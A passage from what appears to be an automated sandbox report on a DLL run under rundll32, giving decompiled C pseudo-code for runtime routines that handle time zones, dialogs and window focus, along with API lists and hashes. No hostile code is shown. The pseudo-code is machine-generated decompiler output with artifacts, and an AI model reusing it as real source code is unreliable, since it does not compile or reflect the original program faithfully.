                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
                                                                                                            				return _t39;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Classlstrlen$H_prologInfoRegister
                                                                                                            • String ID:
                                                                                                            • API String ID: 3690589370-0
                                                                                                            • Opcode ID: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
                                                                                                            • Instruction ID: 82e8c60a7f039037d0512a7f8540e8a50fdd43c9c42e3a44aee07f30fd402b66
                                                                                                            • Opcode Fuzzy Hash: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
                                                                                                            • Instruction Fuzzy Hash: 6B31AE75904219AFDB12DFA0CD85BADBFB9FF04355F104516F805A6162C734AA10CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 94%
                                                                                                            			E10018E14(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				int _t21;
                                                                                                            				long _t22;
                                                                                                            				char* _t24;
                                                                                                            				signed int _t26;
                                                                                                            				signed int _t27;
                                                                                                            				int _t29;
                                                                                                            				char* _t30;
                                                                                                            				int _t32;
                                                                                                            				char* _t33;
                                                                                                            				char* _t34;
                                                                                                            				char* _t35;
                                                                                                            				int _t36;
                                                                                                            				int _t39;
                                                                                                            				int _t41;
                                                                                                            				int _t44;
                                                                                                            				char* _t48;
                                                                                                            				signed int _t49;
                                                                                                            				void* _t51;
                                                                                                            				int _t52;
                                                                                                            				signed int _t54;
                                                                                                            				void* _t56;
                                                                                                            				void* _t58;
                                                                                                            				int _t60;
                                                                                                            				int _t63;
                                                                                                            				void* _t75;
                                                                                                            				void* _t76;
                                                                                                            				void* _t77;
                                                                                                            				signed int _t82;
                                                                                                            				char* _t87;
                                                                                                            				int _t89;
                                                                                                            				void* _t90;
                                                                                                            
                                                                                                            				_push(0x18);
                                                                                                            				_push(0x10042cd0);
                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				 *(_t90 - 0x20) = 0;
                                                                                                            				E10013A38(__ebx, 0, 7);
                                                                                                            				 *(_t90 - 4) = 0;
                                                                                                            				_t63 =  *0x1004f734; // 0x0
                                                                                                            				 *(_t90 - 0x28) = _t63;
                                                                                                            				 *0x1004f814 = 0;
                                                                                                            				 *0x1004ce8c =  *0x1004ce8c | 0xffffffff;
                                                                                                            				 *0x1004ce80 =  *0x1004ce80 | 0xffffffff;
                                                                                                            				_t87 = E1001ADE6(0x10042ccc);
                                                                                                            				 *((intOrPtr*)(_t90 - 0x24)) = _t87;
                                                                                                            				if(_t87 == 0 ||  *_t87 == 0) {
                                                                                                            					_t21 =  *0x1004f818; // 0x0
                                                                                                            					__eflags = _t21;
                                                                                                            					if(__eflags != 0) {
                                                                                                            						_push(_t21);
                                                                                                            						E100107C8(_t63, 0, _t87, __eflags);
                                                                                                            						 *0x1004f818 = 0;
                                                                                                            					}
                                                                                                            					_t22 = GetTimeZoneInformation(0x1004f768);
                                                                                                            					__eflags = _t22 - 0xffffffff;
                                                                                                            					if(_t22 == 0xffffffff) {
                                                                                                            						goto L31;
                                                                                                            					} else {
                                                                                                            						 *0x1004f814 = 1;
                                                                                                            						_t26 = 0x1004f768->Bias; // 0x0
                                                                                                            						_t27 = _t26 * 0x3c;
                                                                                                            						 *0x1004cde8 = _t27;
                                                                                                            						__eflags =  *0x1004f7ae; // 0x0
                                                                                                            						if(__eflags != 0) {
                                                                                                            							_t82 =  *0x1004f7bc; // 0x0
                                                                                                            							_t39 = _t27 + _t82 * 0x3c;
                                                                                                            							__eflags = _t39;
                                                                                                            							 *0x1004cde8 = _t39;
                                                                                                            						}
                                                                                                            						__eflags =  *0x1004f802; // 0x0
                                                                                                            						if(__eflags == 0) {
                                                                                                            							L22:
                                                                                                            							 *0x1004cdec = 0;
                                                                                                            							 *0x1004cdf0 = 0;
                                                                                                            							goto L23;
                                                                                                            						} else {
                                                                                                            							_t36 =  *0x1004f810; // 0x0
                                                                                                            							__eflags = _t36;
                                                                                                            							if(_t36 == 0) {
                                                                                                            								goto L22;
                                                                                                            							}
                                                                                                            							 *0x1004cdec = 1;
                                                                                                            							 *0x1004cdf0 = (_t36 -  *0x1004f7bc) * 0x3c;
                                                                                                            							L23:
                                                                                                            							_t29 = WideCharToMultiByte(_t63, 0, 0x1004f76c, 0xffffffff,  *0x1004ce78, 0x3f, 0, _t90 - 0x1c);
                                                                                                            							__eflags = _t29;
                                                                                                            							if(_t29 == 0) {
                                                                                                            								L26:
                                                                                                            								_t30 =  *0x1004ce78; // 0x1004cdf8
                                                                                                            								 *_t30 = 0;
                                                                                                            								L27:
                                                                                                            								_t32 = WideCharToMultiByte(_t63, 0, 0x1004f7c0, 0xffffffff,  *0x1004ce7c, 0x3f, 0, _t90 - 0x1c);
                                                                                                            								__eflags = _t32;
                                                                                                            								if(_t32 == 0) {
                                                                                                            									L30:
                                                                                                            									_t33 =  *0x1004ce7c; // 0x1004ce38
                                                                                                            									 *_t33 = 0;
                                                                                                            									goto L31;
                                                                                                            								}
                                                                                                            								__eflags =  *(_t90 - 0x1c);
                                                                                                            								if( *(_t90 - 0x1c) != 0) {
                                                                                                            									goto L30;
                                                                                                            								}
                                                                                                            								_t34 =  *0x1004ce7c; // 0x1004ce38
                                                                                                            								_t34[0x3f] = 0;
                                                                                                            								goto L31;
                                                                                                            							}
                                                                                                            							__eflags =  *(_t90 - 0x1c);
                                                                                                            							if( *(_t90 - 0x1c) != 0) {
                                                                                                            								goto L26;
                                                                                                            							}
                                                                                                            							_t35 =  *0x1004ce78; // 0x1004cdf8
                                                                                                            							_t35[0x3f] = 0;
                                                                                                            							goto L27;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t41 =  *0x1004f818; // 0x0
                                                                                                            					if(_t41 == 0) {
                                                                                                            						L6:
                                                                                                            						_t44 = E100107B6(E10011820(_t87) + 1);
                                                                                                            						 *0x1004f818 = _t44;
                                                                                                            						if(_t44 == 0) {
                                                                                                            							L31:
                                                                                                            							_t24 = E1001095E(_t90 - 0x10, 0xffffffff);
                                                                                                            							L47:
                                                                                                            							return E1001254F(_t24);
                                                                                                            						}
                                                                                                            						E10017B90(_t44, _t87);
                                                                                                            						_pop(_t75);
                                                                                                            						 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
                                                                                                            						E1001902F();
                                                                                                            						E10019E20( *0x1004ce78, _t87, 3);
                                                                                                            						_t48 =  *0x1004ce78; // 0x1004cdf8
                                                                                                            						_t48[3] = 0;
                                                                                                            						_t89 = _t87 + 3;
                                                                                                            						if( *_t89 == 0x2d) {
                                                                                                            							 *(_t90 - 0x20) = 1;
                                                                                                            							_t89 = _t89 + 1;
                                                                                                            						}
                                                                                                            						_t49 = E10012749(_t63, _t75, _t90, _t89);
                                                                                                            						_pop(_t76);
                                                                                                            						 *0x1004cde8 = _t49 * 0xe10;
                                                                                                            						while(1) {
                                                                                                            							_t51 =  *_t89;
                                                                                                            							if(_t51 != 0x2b && (_t51 < 0x30 || _t51 > 0x39)) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							_t89 = _t89 + 1;
                                                                                                            						}
                                                                                                            						__eflags =  *_t89 - 0x3a;
                                                                                                            						if( *_t89 != 0x3a) {
                                                                                                            							L42:
                                                                                                            							__eflags =  *(_t90 - 0x20);
                                                                                                            							if( *(_t90 - 0x20) != 0) {
                                                                                                            								 *0x1004cde8 =  ~( *0x1004cde8);
                                                                                                            							}
                                                                                                            							_t52 =  *_t89;
                                                                                                            							 *0x1004cdec = _t52;
                                                                                                            							__eflags = _t52;
                                                                                                            							if(_t52 == 0) {
                                                                                                            								_t24 =  *0x1004ce7c; // 0x1004ce38
                                                                                                            								 *_t24 = 0;
                                                                                                            							} else {
                                                                                                            								E10019E20( *0x1004ce7c, _t89, 3);
                                                                                                            								_t24 =  *0x1004ce7c; // 0x1004ce38
                                                                                                            								_t24[3] = 0;
                                                                                                            							}
                                                                                                            							goto L47;
                                                                                                            						}
                                                                                                            						_t89 = _t89 + 1;
                                                                                                            						_t54 = E10012749(0x30, _t76, _t90, _t89);
                                                                                                            						_pop(_t77);
                                                                                                            						 *0x1004cde8 =  *0x1004cde8 + _t54 * 0x3c;
                                                                                                            						while(1) {
                                                                                                            							_t56 =  *_t89;
                                                                                                            							__eflags = _t56 - 0x30;
                                                                                                            							if(_t56 < 0x30) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							__eflags = _t56 - 0x39;
                                                                                                            							if(_t56 > 0x39) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							_t89 = _t89 + 1;
                                                                                                            							__eflags = _t89;
                                                                                                            						}
                                                                                                            						__eflags =  *_t89 - 0x3a;
                                                                                                            						if( *_t89 != 0x3a) {
                                                                                                            							goto L42;
                                                                                                            						}
                                                                                                            						_t89 = _t89 + 1;
                                                                                                            						 *0x1004cde8 =  *0x1004cde8 + E10012749(0x30, _t77, _t90, _t89);
                                                                                                            						while(1) {
                                                                                                            							_t58 =  *_t89;
                                                                                                            							__eflags = _t58 - 0x30;
                                                                                                            							if(_t58 < 0x30) {
                                                                                                            								goto L42;
                                                                                                            							}
                                                                                                            							__eflags = _t58 - 0x39;
                                                                                                            							if(_t58 > 0x39) {
                                                                                                            								goto L42;
                                                                                                            							}
                                                                                                            							_t89 = _t89 + 1;
                                                                                                            							__eflags = _t89;
                                                                                                            						}
                                                                                                            						goto L42;
                                                                                                            					}
                                                                                                            					if(E10016D00(_t87, _t41) == 0) {
                                                                                                            						goto L31;
                                                                                                            					} else {
                                                                                                            						_t60 =  *0x1004f818; // 0x0
                                                                                                            						_t99 = _t60;
                                                                                                            						if(_t60 != 0) {
                                                                                                            							_push(_t60);
                                                                                                            							E100107C8(_t63, 0, _t87, _t99);
                                                                                                            						}
                                                                                                            						goto L6;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}


































                                                                                                            0x10018e75
                                                                                                            0x10018e98
                                                                                                            0x10018ea0
                                                                                                            0x10018ea7
                                                                                                            0x10018eae
                                                                                                            0x10019018
                                                                                                            0x1001901e
                                                                                                            0x100190b6
                                                                                                            0x100190bb
                                                                                                            0x100190bb
                                                                                                            0x10018eb6
                                                                                                            0x10018ebc
                                                                                                            0x10018ebd
                                                                                                            0x10018ec1
                                                                                                            0x10018ecf
                                                                                                            0x10018ed7
                                                                                                            0x10018edc
                                                                                                            0x10018ee0
                                                                                                            0x10018ee6
                                                                                                            0x10018ee8
                                                                                                            0x10018eef
                                                                                                            0x10018eef
                                                                                                            0x10018ef1
                                                                                                            0x10018ef6
                                                                                                            0x10018efd
                                                                                                            0x10018f04
                                                                                                            0x10018f04
                                                                                                            0x10018f08
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018f1a
                                                                                                            0x10018f1a
                                                                                                            0x10019038
                                                                                                            0x1001903b
                                                                                                            0x1001907b
                                                                                                            0x1001907b
                                                                                                            0x1001907e
                                                                                                            0x10019080
                                                                                                            0x10019080
                                                                                                            0x10019086
                                                                                                            0x10019089
                                                                                                            0x1001908e
                                                                                                            0x10019090
                                                                                                            0x100190ae
                                                                                                            0x100190b3
                                                                                                            0x10019092
                                                                                                            0x1001909b
                                                                                                            0x100190a3
                                                                                                            0x100190a8
                                                                                                            0x100190a8
                                                                                                            0x00000000
                                                                                                            0x10019090
                                                                                                            0x1001903d
                                                                                                            0x1001903f
                                                                                                            0x10019044
                                                                                                            0x10019048
                                                                                                            0x10019055
                                                                                                            0x10019055
                                                                                                            0x10019057
                                                                                                            0x10019059
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019050
                                                                                                            0x10019052
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019054
                                                                                                            0x10019054
                                                                                                            0x10019054
                                                                                                            0x1001905b
                                                                                                            0x1001905e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019060
                                                                                                            0x10019068
                                                                                                            0x10019075
                                                                                                            0x10019075
                                                                                                            0x10019077
                                                                                                            0x10019079
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019070
                                                                                                            0x10019072
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019074
                                                                                                            0x10019074
                                                                                                            0x10019074
                                                                                                            0x00000000
                                                                                                            0x10019075
                                                                                                            0x10018e82
                                                                                                            0x00000000
                                                                                                            0x10018e88
                                                                                                            0x10018e88
                                                                                                            0x10018e8d
                                                                                                            0x10018e8f
                                                                                                            0x10018e91
                                                                                                            0x10018e92
                                                                                                            0x10018e97
                                                                                                            0x00000000
                                                                                                            0x10018e8f
                                                                                                            0x10018e82

                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 10018E27
                                                                                                              • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                                                            • _strlen.LIBCMT ref: 10018E99
                                                                                                            • _strncpy.LIBCMT ref: 10018ECF
                                                                                                              • Part of subcall function 100107C8: __lock.LIBCMT ref: 100107E6
                                                                                                              • Part of subcall function 100107C8: RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D
                                                                                                            • GetTimeZoneInformation.KERNEL32(1004F768,10042CD0,00000018,10019429,10042CE0,00000008,10013474,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 10018F38
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,1004F76C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FC6
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,1004F7C0,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FFA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strlen_strncpy
                                                                                                            • String ID: @hvpYv
                                                                                                            • API String ID: 634650903-2766943729
                                                                                                            • Opcode ID: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
                                                                                                            • Instruction ID: 7381ce5ac415a33791fc082bffc14b542c5be3190c63e6ff879a0c337f862410
                                                                                                            • Opcode Fuzzy Hash: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
                                                                                                            • Instruction Fuzzy Hash: F871F6308046659EF751CB299E85E593FE9EB4B360F20422EE490DF2E1D770DAC2CB59
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 96%
                                                                                                            			E1001F0D1(intOrPtr* __ecx) {
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed int _t67;
                                                                                                            				intOrPtr* _t68;
                                                                                                            				signed int _t74;
                                                                                                            				signed int _t76;
                                                                                                            				struct HWND__* _t77;
                                                                                                            				signed int _t80;
                                                                                                            				int _t96;
                                                                                                            				signed int _t97;
                                                                                                            				intOrPtr* _t107;
                                                                                                            				signed int _t116;
                                                                                                            				signed int _t135;
                                                                                                            				DLGTEMPLATE* _t136;
                                                                                                            				struct HWND__* _t138;
                                                                                                            				void* _t139;
                                                                                                            				void* _t141;
                                                                                                            
                                                                                                            				_t109 = __ecx;
                                                                                                            				E10011BF0(0x1003a3de, _t139);
                                                                                                            				_t107 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t139 - 0x10)) = _t141 - 0x3c;
                                                                                                            				 *((intOrPtr*)(_t139 - 0x20)) = __ecx;
                                                                                                            				if( *(_t139 + 0x10) == 0) {
                                                                                                            					 *(_t139 + 0x10) =  *(E100373B5() + 0xc);
                                                                                                            				}
                                                                                                            				_t135 =  *(E100373B5() + 0x1038);
                                                                                                            				 *(_t139 - 0x28) = _t135;
                                                                                                            				 *(_t139 - 0x14) = 0;
                                                                                                            				 *((intOrPtr*)(_t139 - 0x24)) = 0;
                                                                                                            				 *(_t139 - 4) = 0;
                                                                                                            				E10021D47(_t109, 0x10);
                                                                                                            				E10021D47(_t109, 0x7c000);
                                                                                                            				if(_t135 == 0) {
                                                                                                            					_t136 =  *(_t139 + 8);
                                                                                                            					L7:
                                                                                                            					__eflags = _t136;
                                                                                                            					if(__eflags == 0) {
                                                                                                            						L4:
                                                                                                            						_t67 = 0;
                                                                                                            						L32:
                                                                                                            						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0xc));
                                                                                                            						return _t67;
                                                                                                            					}
                                                                                                            					_t68 = E100243B2();
                                                                                                            					_t129 =  *_t68;
                                                                                                            					 *((intOrPtr*)(_t139 - 0x1c)) =  *((intOrPtr*)( *_t68 + 0xc))() + 0x10;
                                                                                                            					 *(_t139 - 4) = 1;
                                                                                                            					 *((intOrPtr*)(_t139 - 0x18)) = 0;
                                                                                                            					__eflags = E10024A3D(_t107, 0, __eflags, _t136, _t139 - 0x1c, _t139 - 0x18);
                                                                                                            					__eflags =  *0x1004efe4; // 0x0
                                                                                                            					_t74 = 0 | __eflags == 0x00000000;
                                                                                                            					if(__eflags == 0) {
                                                                                                            						L14:
                                                                                                            						__eflags = _t74;
                                                                                                            						if(_t74 == 0) {
                                                                                                            							L17:
                                                                                                            							 *(_t107 + 0x40) =  *(_t107 + 0x40) | 0xffffffff;
                                                                                                            							 *(_t107 + 0x38) =  *(_t107 + 0x38) | 0x00000010;
                                                                                                            							_push(_t107);
                                                                                                            							E100237EE();
                                                                                                            							_t76 =  *(_t139 + 0xc);
                                                                                                            							__eflags = _t76;
                                                                                                            							if(_t76 != 0) {
                                                                                                            								_t77 =  *(_t76 + 0x1c);
                                                                                                            							} else {
                                                                                                            								_t77 = 0;
                                                                                                            							}
                                                                                                            							_t138 = CreateDialogIndirectParamA( *(_t139 + 0x10), _t136, _t77, E1001EB68, 0);
                                                                                                            							E100014B0( *((intOrPtr*)(_t139 - 0x1c)) + 0xfffffff0, _t129);
                                                                                                            							_t116 =  *(_t139 - 0x28);
                                                                                                            							 *(_t139 - 4) =  *(_t139 - 4) | 0xffffffff;
                                                                                                            							__eflags = _t116;
                                                                                                            							if(_t116 != 0) {
                                                                                                            								 *((intOrPtr*)( *_t116 + 0x14))(_t139 - 0x48);
                                                                                                            								__eflags = _t138;
                                                                                                            								if(_t138 != 0) {
                                                                                                            									 *((intOrPtr*)( *_t107 + 0x12c))(0);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_t80 = E10022196();
                                                                                                            							__eflags = _t80;
                                                                                                            							if(_t80 == 0) {
                                                                                                            								 *((intOrPtr*)( *_t107 + 0x114))();
                                                                                                            							}
                                                                                                            							__eflags = _t138;
                                                                                                            							if(_t138 != 0) {
                                                                                                            								__eflags =  *(_t107 + 0x38) & 0x00000010;
                                                                                                            								if(( *(_t107 + 0x38) & 0x00000010) == 0) {
                                                                                                            									DestroyWindow(_t138);
                                                                                                            									_t138 = 0;
                                                                                                            									__eflags = 0;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							__eflags =  *(_t139 - 0x14);
                                                                                                            							if( *(_t139 - 0x14) != 0) {
                                                                                                            								GlobalUnlock( *(_t139 - 0x14));
                                                                                                            								GlobalFree( *(_t139 - 0x14));
                                                                                                            							}
                                                                                                            							__eflags = _t138;
                                                                                                            							_t60 = _t138 != 0;
                                                                                                            							__eflags = _t60;
                                                                                                            							_t67 = 0 | _t60;
                                                                                                            							goto L32;
                                                                                                            						}
                                                                                                            						L15:
                                                                                                            						E10024A0E(_t139 - 0x38, _t136);
                                                                                                            						 *(_t139 - 4) = 2;
                                                                                                            						E10024970(_t107, _t139 - 0x38, 0, _t136,  *((intOrPtr*)(_t139 - 0x18)));
                                                                                                            						 *(_t139 - 0x14) = E10024724(_t139 - 0x38);
                                                                                                            						 *(_t139 - 4) = 1;
                                                                                                            						E10024716(_t139 - 0x38);
                                                                                                            						__eflags =  *(_t139 - 0x14);
                                                                                                            						if( *(_t139 - 0x14) != 0) {
                                                                                                            							_t136 = GlobalLock( *(_t139 - 0x14));
                                                                                                            						}
                                                                                                            						goto L17;
                                                                                                            					}
                                                                                                            					__eflags = _t74;
                                                                                                            					if(_t74 != 0) {
                                                                                                            						goto L15;
                                                                                                            					}
                                                                                                            					_t96 = GetSystemMetrics(0x2a);
                                                                                                            					__eflags = _t96;
                                                                                                            					if(_t96 == 0) {
                                                                                                            						goto L17;
                                                                                                            					}
                                                                                                            					_t97 = E10011CB0(_t107, 0,  *((intOrPtr*)(_t139 - 0x1c)), "MS Shell Dlg");
                                                                                                            					asm("sbb al, al");
                                                                                                            					_t74 =  ~_t97 + 0x00000001 & 0x000000ff;
                                                                                                            					__eflags = _t74;
                                                                                                            					if(_t74 == 0) {
                                                                                                            						goto L17;
                                                                                                            					}
                                                                                                            					__eflags =  *((short*)(_t139 - 0x18)) - 8;
                                                                                                            					if( *((short*)(_t139 - 0x18)) == 8) {
                                                                                                            						 *((intOrPtr*)(_t139 - 0x18)) = 0;
                                                                                                            					}
                                                                                                            					goto L14;
                                                                                                            				}
                                                                                                            				_push(_t139 - 0x48);
                                                                                                            				if( *((intOrPtr*)( *_t107 + 0x12c))() != 0) {
                                                                                                            					_t136 =  *((intOrPtr*)( *_t135 + 0x10))(_t139 - 0x48,  *(_t139 + 8));
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            				goto L4;
                                                                                                            			}






















                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1001F0D6
                                                                                                            • GetSystemMetrics.USER32 ref: 1001F19A
                                                                                                            • GlobalLock.KERNEL32 ref: 1001F205
                                                                                                            • CreateDialogIndirectParamA.USER32(?,?,?,Function_0001EB68,00000000), ref: 1001F234
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                                                            • String ID: MS Shell Dlg
                                                                                                            • API String ID: 2364537584-76309092
                                                                                                            • Opcode ID: c69abc20a306ad5bf7d68b9a9b0dbb7d6744ee1315ae104d5c5fc3f7b317a7db
                                                                                                            • Instruction ID: 46954fd45d3ebabc0cd1c103719a3d91ff65dea30fed852b23a269951fd2c375
                                                                                                            • Opcode Fuzzy Hash: c69abc20a306ad5bf7d68b9a9b0dbb7d6744ee1315ae104d5c5fc3f7b317a7db
                                                                                                            • Instruction Fuzzy Hash: A951AE35900209DFCB11DFA4D8859FEBBB5EF54350F21466AF456EB292DB309E80CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E10023123(void* __ebx, void* __ecx, signed int _a4, long _a8) {
                                                                                                            				struct HWND__* _v8;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t12;
                                                                                                            				void* _t14;
                                                                                                            				void* _t15;
                                                                                                            				void* _t18;
                                                                                                            				void* _t19;
                                                                                                            				void* _t29;
                                                                                                            				struct HWND__* _t30;
                                                                                                            				signed int _t34;
                                                                                                            				void* _t37;
                                                                                                            				void* _t41;
                                                                                                            				void* _t44;
                                                                                                            
                                                                                                            				_t29 = __ebx;
                                                                                                            				_push(__ecx);
                                                                                                            				_t37 = __ecx;
                                                                                                            				_t12 = E10023092(__ecx);
                                                                                                            				_t34 = _a4 & 0x0000fff0;
                                                                                                            				_t41 = _t12;
                                                                                                            				_t14 = _t34 - 0xf040;
                                                                                                            				if(_t14 == 0) {
                                                                                                            					L12:
                                                                                                            					if(_a8 != 0x75 || _t41 == 0) {
                                                                                                            						L15:
                                                                                                            						_t15 = 0;
                                                                                                            						goto L16;
                                                                                                            					} else {
                                                                                                            						E1002040A(_t41);
                                                                                                            						L11:
                                                                                                            						_t15 = 1;
                                                                                                            						L16:
                                                                                                            						return _t15;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t18 = _t14 - 0x10;
                                                                                                            				if(_t18 == 0) {
                                                                                                            					goto L12;
                                                                                                            				}
                                                                                                            				_t19 = _t18 - 0x10;
                                                                                                            				if(_t19 == 0 || _t19 == 0xa0) {
                                                                                                            					if(_t34 == 0xf060 || _a8 != 0) {
                                                                                                            						if(_t41 != 0) {
                                                                                                            							_push(_t29);
                                                                                                            							_t30 =  *(_t37 + 0x1c);
                                                                                                            							_v8 = GetFocus();
                                                                                                            							E100220EE(_t44, SetActiveWindow( *(_t41 + 0x1c)));
                                                                                                            							SendMessageA( *(_t41 + 0x1c), 0x112, _a4, _a8);
                                                                                                            							if(IsWindow(_t30) != 0) {
                                                                                                            								SetActiveWindow(_t30);
                                                                                                            							}
                                                                                                            							if(IsWindow(_v8) != 0) {
                                                                                                            								SetFocus(_v8);
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					goto L11;
                                                                                                            				} else {
                                                                                                            					goto L15;
                                                                                                            				}
                                                                                                            			}

















                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ActiveFocus$MessageSend
                                                                                                            • String ID: u
                                                                                                            • API String ID: 1556911595-4067256894
                                                                                                            • Opcode ID: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
                                                                                                            • Instruction ID: 4dd9d1b88c5e5c3b3a68c724072b9ea331201f72bd5375ef8a8f6a79988825c8
                                                                                                            • Opcode Fuzzy Hash: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
                                                                                                            • Instruction Fuzzy Hash: 53113832A0021DBFDB21DF75EC4595E7BA4EF41390B80C822ED02D61A6DA34ED60CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10024970(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, short _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v40;
                                                                                                            				void _v68;
                                                                                                            				intOrPtr _v72;
                                                                                                            				intOrPtr _t14;
                                                                                                            				void* _t15;
                                                                                                            				int _t24;
                                                                                                            				char* _t30;
                                                                                                            				struct HDC__* _t32;
                                                                                                            
                                                                                                            				_t14 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_t32 = GetStockObject;
